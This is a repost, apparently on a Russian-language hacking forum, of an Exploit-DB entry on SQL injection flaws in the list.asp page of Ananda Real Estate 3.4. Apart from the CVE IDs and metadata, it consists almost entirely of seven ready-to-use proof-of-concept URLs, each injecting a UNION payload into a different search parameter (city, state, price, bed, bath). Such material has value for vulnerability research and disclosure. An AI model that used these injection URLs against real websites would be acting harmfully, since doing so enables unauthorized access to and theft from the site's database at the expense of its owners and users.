Exploit Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
15661
Проверка EDB
  1. Пройдено
Автор
UNDERGROUND-STOCKHOLM.COM
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2010-4782 cve-2006-6807
Дата публикации
2010-12-02
Код:
TITLE: Ananda Real Estate "list.asp" Multiple SQL Injection Vulnerabilities
PRODUCT: Ananda Real Estate 3.4
PRODUCT URL: http://www.softwebsnepal.com/website_design_realestate.htm
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

BUGS:

http://[host]/[path]/list.asp?city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=%27%29%29+union+insect&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=%27%29%29+union+insect&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=%27%29%29+union+insect&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=%27%29%29+union+insect&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=%27%29%29+union+insect&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=&bath=%27%29%29+union+insect&Submit=Search+Now!
 
Источник
www.exploit-db.com

Похожие темы